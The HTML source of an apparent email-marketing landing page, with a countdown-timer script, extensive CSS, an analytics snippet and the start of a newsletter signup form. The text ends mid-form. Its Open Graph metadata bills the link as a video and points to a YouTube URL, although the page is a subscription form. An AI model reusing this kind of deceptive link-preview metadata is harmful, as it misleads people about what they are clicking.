
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
		<meta name="description" content="">
		<meta name="keywords" content="">
		<meta name="author" content="">
		<meta property="og:type" content="website">
		<meta property="og:title" content="⏬🎬 Video Here 🎬 ⏬">
		<meta property="og:description" content="This is the video, Click Here">
		<meta property="og:image" content="https://bucket.mlcdn.com/a/1125/1125614/images/f6db20d76fe2738fad7f6ec241e8353d8c6eb53a.jpeg/bd4cad1eb6ad5dde01a8706409dd4e458e5ba9b2.jpeg">
		<meta property="og:url" content="https://www.youtube.com/watch?v=W1rygySfdeo">
		<meta name="robots" content="index,follow">
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <title>Play Video</title>
		



<style type="text/css">
    @import url(https://fonts.googleapis.com/css?family=Lato:400,400italic,700,700italic);
</style>


		<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script>
	function timers() {
		setTimeout(function(){

			$('.countdown').each(function() {
			    if (! $(this).data('countdown-bound')) {
                    var id = $(this).attr('id');
                    var date = $(this).attr('data-date');

                    $(this).data('countdown-bound', true);
                    initializeClock(id, date);
                }
			});
		});
	}

	$(document).ready(function () {
		timers();

        $('body').on('DOMNodeInserted',function(e) {
            timers();
        });
	});

	function getTimeRemaining(endtime) {
        endtime = endtime.replace(' ', 'T');

        var t = Date.parse(endtime) - Date.parse(new Date()) + (new Date().getTimezoneOffset() * 60 * 1000);
		var seconds = Math.floor((t / 1000) % 60);
		var minutes = Math.floor((t / 1000 / 60) % 60);
		var hours = Math.floor((t / (1000 * 60 * 60)) % 24);
		var days = Math.floor(t / (1000 * 60 * 60 * 24));
		return {
			'total': t,
			'days': days,
			'hours': hours,
			'minutes': minutes,
			'seconds': seconds
		};
	}

	function initializeClock (id, endtime) {
		var clock = document.getElementById(id);
		var daysSpan = clock.querySelector('.days');
		var hoursSpan = clock.querySelector('.hours');
		var minutesSpan = clock.querySelector('.minutes');
		var secondsSpan = clock.querySelector('.seconds');

		function updateClock() {
			var t = getTimeRemaining(endtime);

			daysSpan.innerHTML = t.days;
			hoursSpan.innerHTML = ('0' + t.hours).slice(-2);
			minutesSpan.innerHTML = ('0' + t.minutes).slice(-2);
			secondsSpan.innerHTML = ('0' + t.seconds).slice(-2);

			if (t.total <= 0) {
				daysSpan.innerHTML = '00';
				hoursSpan.innerHTML = '00';
				minutesSpan.innerHTML = '00';
				secondsSpan.innerHTML = '00';
			}
		}

		updateClock();

		if (window['timerinterval' + id]) {
			clearInterval(window['timerinterval' + id]);
		}

		window['timerinterval' + id] = setInterval(updateClock, 1000);
	}
</script>

	<style type="text/css">
				.ml-1 {
					background-color: #f6f6f6;
					padding-bottom: 40px;
					padding-top: 40px;
				}
				.navbar-brand {
					height: 70px;
				}
				.navbar-nav li a {
					padding-bottom: 25px;
					padding-top: 25px;
				}
				.ml-1 .nav li a {
					color: #000000;
					font-size: 14px;
					font-weight: normal; font-style: normal; text-decoration: none;
				}
				.ml-1 .nav li a:focus,
				.ml-1 .nav li a:hover {
					background: none;
					opacity: 0.7;
					text-decoration: none;
				}
				.navbar-toggle {
					background: #000000;
				}
				.navbar-toggle .icon-bar {
					background: #f6f6f6;
				}
				@media (max-width: 402.83333333333337px) {
					.navbar-header .navbar-brand img {
						width: 100%!important;
						height: auto!important;
					}
					.navbar-brand {
						height: auto!important;
					}
				}
			</style><style type="text/css">
	.ml-8.hero {
		background-image: url('');
		background-color: #1e94cc;
		background-size: cover;
		padding-bottom: 60px;
		padding-top: 60px;
		margin-top: 0px;
		margin-bottom: 30px;
	}
	.img-ml-8 {
		border-radius: 0px;
	}
	.ml-8 .form-box {
		background-color: rgba(25, 67, 87, 1);
		border: 0px solid #000000;
		border-radius: 5px;
		padding: 30px;
	}
	.ml-8 h1 {
		color: #ffffff;
		font-size: 48px;
		font-weight: bold; font-style: normal; text-decoration: none;
		text-align: center;
		margin-bottom: 30px;
	}
	.ml-8 p {
		color: #ffffff;
		font-size: 18px;
		margin-bottom: 15px;
	}
	.ml-8 p:last-child {
		margin-bottom: 30px;
	}
	.ml-8 p a {
		color: #ffffff;
		text-decoration: underline;
	}
	.ml-8 .input-group.ml-error input {
		border: 2px solid red;
		z-index: 9999;
	}
	.ml-8 .form-group.ml-error input {
		border: 2px solid red;
	}
	.ml-8 .form-control {
		background-color: #ffffff;
		border-radius: 5px;
		color: #333333;
		font-size: 14px;
		height: 50px;
		line-height: 50px;
		padding: 6px 24px;
	}
	.ml-8 .form-control::-webkit-input-placeholder { 
		color: #666666;
	}
	.ml-8 .form-control:-moz-placeholder { 
		color: #666666;
		opacity:  1;
	}
	.ml-8 .form-control::-moz-placeholder { 
		color: #666666;
		opacity:  1;
	}
	.ml-8 .form-control:-ms-input-placeholder {
		color: #666666;
	}
	.ml-8 button {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		height: 50px;
		border: none;
		padding: 6px 24px;
	}
	.ml-8 button:hover,
	.ml-8 button:focus,
	.ml-8 button:active,
	.ml-8 button:active:hover {
		background-color: #222222;
		color: #ffffff;
	}
	.ml-8 .form-group label {
		color: #ffffff;
		font-size: 16px;
		font-weight: normal; font-style: normal; text-decoration: none;
	}
	.ml-8 .checkbox {
		margin-top: 0px;
		margin-bottom: 15px;
	}
	.ml-8 .checkbox label {
		color: #ffffff;
		font-size: 12px;
		font-weight: normal; font-style: normal; text-decoration: none;
		line-height: 20px;
	}

  .ml-8 .checkbox.ml-error label {
    border-bottom: 2px solid red;
  }

  select.form-control.ml-error {
    border-color: red!important;
  }
  
  @media (max-width: 768px) {
    .ml-8 .ml-image-top {
      margin-bottom: 30px;
    }
    .ml-8 .ml-image-bottom {
      margin-top: 30px;
    }
    
		.ml-8 .input-group input.form-control {
			border-radius: 5px!important;
		}

		.ml-8 .input-group span.input-group-btn button {
			border-radius: 5px!important;
		}	
	}
</style><style type="text/css">
								@media (max-width: 768px) {
									.ml-8 h1 {
										font-size: 28px!important;
									}
									.ml-8 h2 {
										font-size: 20px!important;
									}
									.ml-8 p {
										font-size: 18px!important;
									}
									  .ml-8 {
										margin-bottom: 15px!important;
										margin-top: 0px!important;
									}
								}
							</style><style type="text/css">
	.ml-10 {
		background-color: #f6f6f6;
		padding-bottom: 30px;
		padding-top: 30px;
	}
	.ml-10 h1 {
		color: #000000;
		font-size: 36px;
		font-weight: normal; font-style: normal; text-decoration: none;
		text-align: center;
	}
</style><style type="text/css">
								@media (max-width: 768px) {
									.ml-10 h1 {
										font-size: 28px!important;
									}
								}
							</style><style type="text/css">
	.ml-12 {
		background-color: #f6f6f6;
		padding-bottom: 10px;
		padding-top: 10px;
	}
	.ml-12 hr {
		border-top: 1px solid #000000;
		width: 10%;
	}
</style><style type="text/css">
	.ml-15 .media-left {
		padding-right: 15px;
	}
	.ml-15 .media-object {
		border-radius: 100px;
	}
	.ml-15 .media-body .media-heading {
		margin: 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
	}
	.ml-15 .media-body p:first-child {
		margin-top: 15px;
	}
	.ml-15 .media-body p:last-child {
		margin-bottom: 0px;
	}
	.ml-15 .media-body p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 24px;
	}
	.ml-15 .media-body .details {
		color: #000000;
		font-size: 14;
		font-weight: normal; font-style: normal; text-decoration: none;
		line-height: 24px;
	}
	.ml-15 .media-body p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.ml-15 .media-body .blockquote-15 {
		border-left-color: rgba(105, 105, 105, .5);
		margin-bottom: 0;
		margin-top: 15px;
	}
	.ml-15 .media-body .blockquote-15 p:first-child {
		margin-top: 0;
	}
	
</style><style type="text/css">
	.ml-16 .media-left {
		padding-right: 15px;
	}
	.ml-16 .media-object {
		border-radius: 100px;
	}
	.ml-16 .media-body .media-heading {
		margin: 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
	}
	.ml-16 .media-body p:first-child {
		margin-top: 15px;
	}
	.ml-16 .media-body p:last-child {
		margin-bottom: 0px;
	}
	.ml-16 .media-body p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 24px;
	}
	.ml-16 .media-body .details {
		color: #000000;
		font-size: 14;
		font-weight: normal; font-style: normal; text-decoration: none;
		line-height: 24px;
	}
	.ml-16 .media-body p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.ml-16 .media-body .blockquote-16 {
		border-left-color: rgba(105, 105, 105, .5);
		margin-bottom: 0;
		margin-top: 15px;
	}
	.ml-16 .media-body .blockquote-16 p:first-child {
		margin-top: 0;
	}
	
</style><style type="text/css">
	.ml-17 .media-left {
		padding-right: 15px;
	}
	.ml-17 .media-object {
		border-radius: 100px;
	}
	.ml-17 .media-body .media-heading {
		margin: 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
	}
	.ml-17 .media-body p:first-child {
		margin-top: 15px;
	}
	.ml-17 .media-body p:last-child {
		margin-bottom: 0px;
	}
	.ml-17 .media-body p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 24px;
	}
	.ml-17 .media-body .details {
		color: #000000;
		font-size: 14;
		font-weight: normal; font-style: normal; text-decoration: none;
		line-height: 24px;
	}
	.ml-17 .media-body p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.ml-17 .media-body .blockquote-17 {
		border-left-color: rgba(105, 105, 105, .5);
		margin-bottom: 0;
		margin-top: 15px;
	}
	.ml-17 .media-body .blockquote-17 p:first-child {
		margin-top: 0;
	}
	
</style><style type="text/css">
	.ml-15 .media-left {
		padding-right: 15px;
	}
	.ml-15 .media-object {
		border-radius: 100px;
	}
	.ml-15 .media-body .media-heading {
		margin: 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
	}
	.ml-15 .media-body p:first-child {
		margin-top: 15px;
	}
	.ml-15 .media-body p:last-child {
		margin-bottom: 0px;
	}
	.ml-15 .media-body p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 24px;
	}
	.ml-15 .media-body .details {
		color: #000000;
		font-size: 14;
		font-weight: normal; font-style: normal; text-decoration: none;
		line-height: 24px;
	}
	.ml-15 .media-body p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.ml-15 .media-body .blockquote-15 {
		border-left-color: rgba(105, 105, 105, .5);
		margin-bottom: 0;
		margin-top: 15px;
	}
	.ml-15 .media-body .blockquote-15 p:first-child {
		margin-top: 0;
	}
	
</style><style type="text/css">
	.ml-16 .media-left {
		padding-right: 15px;
	}
	.ml-16 .media-object {
		border-radius: 100px;
	}
	.ml-16 .media-body .media-heading {
		margin: 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
	}
	.ml-16 .media-body p:first-child {
		margin-top: 15px;
	}
	.ml-16 .media-body p:last-child {
		margin-bottom: 0px;
	}
	.ml-16 .media-body p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 24px;
	}
	.ml-16 .media-body .details {
		color: #000000;
		font-size: 14;
		font-weight: normal; font-style: normal; text-decoration: none;
		line-height: 24px;
	}
	.ml-16 .media-body p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.ml-16 .media-body .blockquote-16 {
		border-left-color: rgba(105, 105, 105, .5);
		margin-bottom: 0;
		margin-top: 15px;
	}
	.ml-16 .media-body .blockquote-16 p:first-child {
		margin-top: 0;
	}
	
</style><style type="text/css">
	.ml-15 .media-left {
		padding-right: 15px;
	}
	.ml-15 .media-object {
		border-radius: 100px;
	}
	.ml-15 .media-body .media-heading {
		margin: 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
	}
	.ml-15 .media-body p:first-child {
		margin-top: 15px;
	}
	.ml-15 .media-body p:last-child {
		margin-bottom: 0px;
	}
	.ml-15 .media-body p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 24px;
	}
	.ml-15 .media-body .details {
		color: #000000;
		font-size: 14;
		font-weight: normal; font-style: normal; text-decoration: none;
		line-height: 24px;
	}
	.ml-15 .media-body p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.ml-15 .media-body .blockquote-15 {
		border-left-color: rgba(105, 105, 105, .5);
		margin-bottom: 0;
		margin-top: 15px;
	}
	.ml-15 .media-body .blockquote-15 p:first-child {
		margin-top: 0;
	}
	
</style><style type="text/css">
									.ml-14 {
										background-color: #f6f6f6;
										padding-bottom: 30px;
										padding-top: 30px;
									}
									@media (max-width: 768px) {
										.ml-14 h1 {
											font-size: 28px!important;
										}
										.ml-14 h2 {
											font-size: 20px!important;
										}
										.ml-14 p {
											font-size: 14px!important;
										}
									}
								</style><style type="text/css">
	.ml-22 {
		background-color: #f6f6f6;
		padding-bottom: 30px;
		padding-top: 30px;
	}
	.ml-22 h1 {
		color: #000000;
		font-size: 36px;
		font-weight: normal; font-style: normal; text-decoration: none;
		text-align: center;
	}
</style><style type="text/css">
								@media (max-width: 768px) {
									.ml-22 h1 {
										font-size: 28px!important;
									}
								}
							</style><style type="text/css">
	.ml-24 {
		background-color: #f6f6f6;
		padding-bottom: 10px;
		padding-top: 10px;
	}
	.ml-24 hr {
		border-top: 1px solid #000000;
		width: 10%;
	}
</style><style type="text/css">
	.img-27 {
		text-align: center;
	}
	.img-27 img {
		display: inline-block !important;
		margin: 0 0 15px 0;
		border-radius: 100px;
	}
	.subtitle-27 {
		margin: 0 0 15px 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
		text-align: center;
	}
	.text-27 p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 26px;
	}
	.text-27 p:last-child {
		margin-bottom: 0;
	}
	.text-27 p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.btn-27 {
		text-align: center;
	}
	.btn-27 .btn {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		border: none;
		margin-top: 15px;
	}
	.btn-27 .btn:hover {
		background-color: #222222;
		color: #ffffff;
	}
</style><style type="text/css">
	.img-28 {
		text-align: center;
	}
	.img-28 img {
		display: inline-block !important;
		margin: 0 0 15px 0;
		border-radius: 0px;
	}
	.subtitle-28 {
		margin: 0 0 15px 0;
		color: #000000;
		font-size: 20;
		font-weight: normal; font-style: normal; text-decoration: none;
		text-align: center;
	}
	.text-28 p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 26px;
	}
	.text-28 p:last-child {
		margin-bottom: 0;
	}
	.text-28 p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.btn-28 {
		text-align: center;
	}
	.btn-28 .btn {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		border: none;
		margin-top: 15px;
	}
	.btn-28 .btn:hover {
		background-color: #222222;
		color: #ffffff;
	}
</style><style type="text/css">
	.img-29 {
		text-align: center;
	}
	.img-29 img {
		display: inline-block !important;
		margin: 0 0 15px 0;
		border-radius: 0px;
	}
	.subtitle-29 {
		margin: 0 0 15px 0;
		color: #000000;
		font-size: 20;
		font-weight: normal; font-style: normal; text-decoration: none;
		text-align: center;
	}
	.text-29 p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 26px;
	}
	.text-29 p:last-child {
		margin-bottom: 0;
	}
	.text-29 p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.btn-29 {
		text-align: center;
	}
	.btn-29 .btn {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		border: none;
		margin-top: 15px;
	}
	.btn-29 .btn:hover {
		background-color: #222222;
		color: #ffffff;
	}
</style><style type="text/css">
	.img-27 {
		text-align: center;
	}
	.img-27 img {
		display: inline-block !important;
		margin: 0 0 15px 0;
		border-radius: 100px;
	}
	.subtitle-27 {
		margin: 0 0 15px 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
		text-align: center;
	}
	.text-27 p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 26px;
	}
	.text-27 p:last-child {
		margin-bottom: 0;
	}
	.text-27 p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.btn-27 {
		text-align: center;
	}
	.btn-27 .btn {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		border: none;
		margin-top: 15px;
	}
	.btn-27 .btn:hover {
		background-color: #222222;
		color: #ffffff;
	}
</style><style type="text/css">
	.img-28 {
		text-align: center;
	}
	.img-28 img {
		display: inline-block !important;
		margin: 0 0 15px 0;
		border-radius: 0px;
	}
	.subtitle-28 {
		margin: 0 0 15px 0;
		color: #000000;
		font-size: 20;
		font-weight: normal; font-style: normal; text-decoration: none;
		text-align: center;
	}
	.text-28 p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 26px;
	}
	.text-28 p:last-child {
		margin-bottom: 0;
	}
	.text-28 p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.btn-28 {
		text-align: center;
	}
	.btn-28 .btn {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		border: none;
		margin-top: 15px;
	}
	.btn-28 .btn:hover {
		background-color: #222222;
		color: #ffffff;
	}
</style><style type="text/css">
	.img-27 {
		text-align: center;
	}
	.img-27 img {
		display: inline-block !important;
		margin: 0 0 15px 0;
		border-radius: 100px;
	}
	.subtitle-27 {
		margin: 0 0 15px 0;
		color: #000000;
		font-size: 20;
		font-weight: bold; font-style: normal; text-decoration: none;
		text-align: center;
	}
	.text-27 p {
		margin: 0 0 15px 0;
		color: #696969;
		font-size: 14px;
		line-height: 26px;
	}
	.text-27 p:last-child {
		margin-bottom: 0;
	}
	.text-27 p a {
		color: #000000;
		font-size: 14;
		text-decoration: ;
	}
	.btn-27 {
		text-align: center;
	}
	.btn-27 .btn {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		border: none;
		margin-top: 15px;
	}
	.btn-27 .btn:hover {
		background-color: #222222;
		color: #ffffff;
	}
</style><style type="text/css">
									.ml-26 {
										background-color: #f6f6f6;
										padding-bottom: 30px;
										padding-top: 30px;
									}
									@media (max-width: 768px) {
										.ml-26 h1 {
											font-size: 28px!important;
										}
										.ml-26 h2 {
											font-size: 20px!important;
										}
										.ml-26 p {
											font-size: 14px!important;
										}
									}
								</style><style type="text/css">
	.ml-37 {
		background-color: #f6f6f6;
		padding-bottom: 30px;
		padding-top: 30px;
	}
	.ml-37 h1 {
		color: #000000;
		font-size: 36px;
		font-weight: normal; font-style: normal; text-decoration: none;
		text-align: center;
	}
</style><style type="text/css">
								@media (max-width: 768px) {
									.ml-37 h1 {
										font-size: 28px!important;
									}
								}
							</style><style type="text/css">
	.ml-39 {
		background-color: #f6f6f6;
		padding-bottom: 10px;
		padding-top: 10px;
	}
	.ml-39 hr {
		border-top: 1px solid #000000;
		width: 10%;
	}
</style><style type="text/css">
	.ml-41 {
		background-color: #f6f6f6;
		padding-bottom: 30px;
		padding-top: 30px;
	}
	.ml-41 p {
		color: #696969;
		font-size: 14px;
		line-height: 26px;
		margin: 0 0 15px 0;
	}
	.ml-41 p:last-child {
		margin-bottom: 0;
	}
	.ml-41 p a {
		color: #000000;
		text-decoration: underline;
	}
</style><style type="text/css">
								@media (max-width: 768px) {
									.ml-41 p {
										font-size: 14px!important;
									}
								}
							</style><style type="text/css">
	.ml-43 {
		background-color: #f6f6f6;
		padding-bottom: 30px;
		padding-top: 30px;
	}
	.ml-43 .img-responsive {
		border-radius: 0px;
	}
</style><style type="text/css">
	.ml-45 {
		background: url('') #f6f6f6;
		background-position: center center;
		padding-bottom: 30px;
		padding-top: 30px;
	}
	.ml-45 .btn {
		background-color: #000000;
		font-size: 18px;
		color: #ffffff;
		border-radius: 5px;
		font-weight: normal; font-style: normal; text-decoration: none;
		height: auto;
		line-height: 100%;
		padding: 14px 12px;
		white-space: normal;
	}
	.ml-45 .btn:hover {
		background-color: #222222;
		color: #ffffff;
	}	
</style><style type="text/css">
				.ml-46 {
					background-color: #1e94cc;
					padding-bottom: 30px;
					color: #ffffff;
					font-size: 14px;
					padding-top: 30px;
				} 
				.ml-46 .social-icons {
					margin: 0;
					padding: 0;
				}
				.ml-46 .social-icons li {
					list-style: none;
					display: inline-block;
					margin-right: 10px;
				}
				.ml-46 .social-icons li:last-child {
					margin-right: 0;
				}
				
				@media (max-width: 768px) {
					.ml-46 {
						margin-bottom: 0px;
						margin-top: 15px;
					}
				}
				
			</style><style type="text/css">
			body {
				padding: 0px 0 0px 0;
				background: #f6f6f6;
			    font-family: 'Lato', Arial, Helvetica, sans-serif;
			    line-height: 200%;
			}
			.ml-subscribe-form {
				margin-top: 30px;
			}
			.checkbox.ml-validate-required.ml-error p, .checkbox.ml-validate-required.ml-error p a {
				color: red!important;
			} 
		h1,h2,h3,h4,h5,h6 {
	margin: 0;
	padding: 0;
}
p {
			margin: 0 0 15px 0;
		}
.align-center { text-align: center; }
.align-left { text-align: left; }
.align-right { text-align: right; }
.mt0 { margin-top: 0 !important; }
.mt10 { margin-top: 10px !important; }
.mt20 { margin-top: 20px !important; }
.mt30 { margin-top: 30px !important; }
.mt40 { margin-top: 40px !important; }
.mt50 { margin-top: 50px !important; }
.mt60 { margin-top: 60px !important; }
.mt70 { margin-top: 70px !important; }
.mt80 { margin-top: 80px !important; }
.mt90 { margin-top: 90px !important; }
.mt100 { margin-top: 100px !important; }
.mb0 { margin-bottom: 0 !important; }
.mb10 { margin-bottom: 10px !important; }
.mb20 { margin-bottom: 20px !important; }
.mb30 { margin-bottom: 30px !important; }
.mb40 { margin-bottom: 40px !important; }
.mb50 { margin-bottom: 50px !important; }
.mb60 { margin-bottom: 60px !important; }
.mb70 { margin-bottom: 70px !important; }
.mb80 { margin-bottom: 80px !important; }
.mb90 { margin-bottom: 90px !important; }
.mb100 { margin-bottom: 100px !important; }
.pt0 { padding-top: 0 !important; }
.pt10 { padding-top: 10px !important; }
.pt20 { padding-top: 20px !important; }
.pt30 { padding-top: 30px !important; }
.pt40 { padding-top: 40px !important; }
.pt50 { padding-top: 50px !important; }
.pt60 { padding-top: 60px !important; }
.pt70 { padding-top: 70px !important; }
.pt80 { padding-top: 80px !important; }
.pt90 { padding-top: 90px !important; }
.pt100 { padding-top: 100px !important; }
.pb0 { padding-bottom: 0 !important; }
.pb10 { padding-bottom: 10px !important; }
.pb20 { padding-bottom: 20px !important; }
.pb30 { padding-bottom: 30px !important; }
.pb40 { padding-bottom: 40px !important; }
.pb50 { padding-bottom: 50px !important; }
.pb60 { padding-bottom: 60px !important; }
.pb70 { padding-bottom: 70px !important; }
.pb80 { padding-bottom: 80px !important; }
.pb90 { padding-bottom: 90px !important; }
.pb100 { padding-bottom: 100px !important; }
.pl0 { padding-left: 0px !important; }
.pr0 { padding-right: 0px !important; }

form {
	margin-top: 0px;
	margin-bottom: 0px;
}
.form-control {
	border: none;
}
.form-control:focus {
	border: none;
	box-shadow: none;
	outline: medium none;
}
.btn.active.focus, 
.btn.active:focus, 
.btn.focus, 
.btn:active.focus, 
.btn:active:focus, 
.btn:focus {
	box-shadow: none;
	outline: medium none;
}

.display-inline {
    display: inline-block !important;
}

.display-none {
    display: none !important;
}
		.navbar-brand {
			padding: 0px;
		}
		.navbar-brand>img {
			height: 100%;
			padding: 7px 15px;
			width: auto;
		}
		.ml-spacer-hack {
			display: block;
			height: 15px;
		}
		/* */
		.display-table {
			display: table;
		    table-layout: fixed;
		    width: 100%;
		}
		.col-middle {
		    vertical-align: middle;
		}
		.col-height {
		    display: table-cell;
		    float: none;
		    height: 100%;
		}
		.media {
			margin-top: 0px;
		}
input:-webkit-autofill {
    -webkit-box-shadow: 0 0 0px 1000px white inset;
}

@media (max-width: 992px) {
	.ts-block .media-left {
		float: left;
		width: 100%;
		margin-bottom: 15px;
	}
}

@media (max-width: 768px) {
	
	.ts-block .media-left {
		float: none;
		width: auto;
		margin-bottom: 0px;
	}
		
	.container-fluid{
		padding: 15px 30px!important;
	}
	
	.hero h1 {
		margin-bottom: 15px!important;
	}

	.ml-subscribe-form {
		margin-top: 0!important;
		padding: 15px 0!important;
	}

	.container {
		padding: 0px!important;
	}

	.default {
		padding: 0px 30px!important;
	}

	.copyright {
		text-align: center!important;
	}

	ul.list-centered {
		margin-bottom: -10px!important;
	}

	ul.list-centered li {
		margin-bottom: 10px!important;
	}

	.social-icons-block {
		text-align: center!important;
	}

	.social-icons-block ul {
		float: none!important;
	}

	.navbar-header .navbar-brand{
		/* Firefox */
		width: -moz-calc(100% - 80px);
		/* WebKit */
		width: -webkit-calc(100% - 80px);
		/* Opera */
		width: -o-calc(100% - 80px);
		/* Standard */
		width: calc(100% - 80px);
	}

	.navbar-header .navbar-brand img{
		padding: 0px!important;
	}

	.ml-date {
		margin-bottom: 15px!important;
	}

	.ml-date:last-child {
		margin-bottom: 0px!important;
	}

	.mb-30 {
		margin-bottom: 15px!important;
	}	
	
	.media .media-left .media-object {
		width: 100px!important;
	}
	
	.col-height {
		display: block !important;
	}
	.col-image-text {
		margin-bottom: 30px;
	}
	.col-text-image {
		margin-top: 30px;
	}
	.col-res-30 {
		margin-bottom: 30px;
	}
	.btn, .form-control {
     white-space: normal !important;
     line-height: 100% !important;
     height: auto !important;
     padding: 10px !important;
	}
	h1,h2,h3 {
	    word-break: break-word;
	}
	/* Social share */
	.list-centered.share-icons li a img {
		margin: 5px;
	}
	/* Gallery */
	.gallery .img-responsive {
		margin-bottom: 30px;
	}
	.gallery .align-center:last-child .img-responsive {
		margin-bottom: 0px;
	}
	
	/* INPUT AND BUTTON  */

	.input-group {
    	width: 100%!important;
	}
	
	input.form-control {
	}
	
	span.input-group-btn {
	    float: left!important;
	    margin-top: 15px!important;
	    width: 100%!important;
	}
	
	button.btn {
	    width: 100%!important;
	}
}

		</style></head>
	<body>
		
		
		
		    
			
		    
		    
				
			
			
			
		
			
				
				
				
				
			
			
				
				
				
				
			
			
				
				
			
			
				
					
			
			
				
				
					
			
			
			
				
				
				
				
				
			
			
				
				
				
				
				
				
			
			
				
				
				
				
				
			
	    
    
    
    
	    
		
		
			
			
				
				
      	
      	
      	
				
					
				
				
					
					
					
				
			
			
			
			<div class="container-fluid ml-1">
				<div class="container">
  				<div class="row">
          	<div class="col-sm-12">
          		<div class="navbar-header">
    						   
    						<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> 
                              <span class="sr-only">Toggle navigation</span>
                              <span class="icon-bar"></span>
                              <span class="icon-bar"></span>
                              <span class="icon-bar"></span> 
                            </button>
    						
      					
      					<a class="navbar-brand" href="#">
        					<img src="https://bucket.mlcdn.com/a/498/498695/images/43a3d870ba2ec3aa6e5c6da19c263b5d387e6f8d.png" style="display: block;" border="0">
      					</a> 
    					</div> 
    					<div id="navbar" class="collapse navbar-collapse">
    						<ul class="nav navbar-nav navbar-right">
    							<li class=""><a href="#">Today's deals</a> </li><li class=""><a href="#">Special offers</a> </li><li class=""><a href="#">Contacts</a> </li> 
    						</ul>
    					</div>
          	</div>
          </div>
				</div>
			</div>
			
		
		
		<div class="row-form">
			
					
<!--  -->
<div class="editor-html-code">
	<meta name="google-site-verification" content="RsqbmjNcjbK9qADCp7OMjEGeFWcUcMu4Mk4yh50ZjZk">
</div>
<!--  -->

				
					
<!--  -->
<div class="editor-html-code">
	<!-- Etiqueta global de sitio (gtag.js) de Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=GA_TRACKING_ID"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'GA_TRACKING_ID');
</script>
</div>
<!--  -->

				 
					<div class="container-fluid ml-8 hero">
						<div class="container">
							
								
	


	
	
	
	
	
		
		
	
	
		
		
		
	
	
		
		
		
		
		
	
	
		
		
		
		
	
	
		
		
	
	
		
		
	
  
		
		
		
		
		
		
	
	
		
		
		
		
		
	
	
		
		
		
	
	
		
		
		
	
  
		
    
    
  





  <div class="ml-subscribe-form mt0" id="mlb2-841852">
    <form action="https://app.mailerlite.com/webforms/submit/l4e7z1" data-code="l4e7z1" method="POST">
      <div class="row">
        <div class="display-table">
          <div class="col-sm-6 col-height col-middle">
            
            <div class="align-center">
              <img class="img-responsive display-inline img-ml-8 ml-image-top" src="https://bucket.mlcdn.com/a/498/498695/images/e08447e0ada488ce230be3c4ee61dff5cbaed0a3.png" alt="" width="650" style="display: block;" border="0">
            </div>
          </div>
          <div class="col-sm-6 column-8 col-height col-middle">
            <div class="form-box">
              <h1>The Ultimate Guide to Get More Subscribers</h1>
              <div class="text">
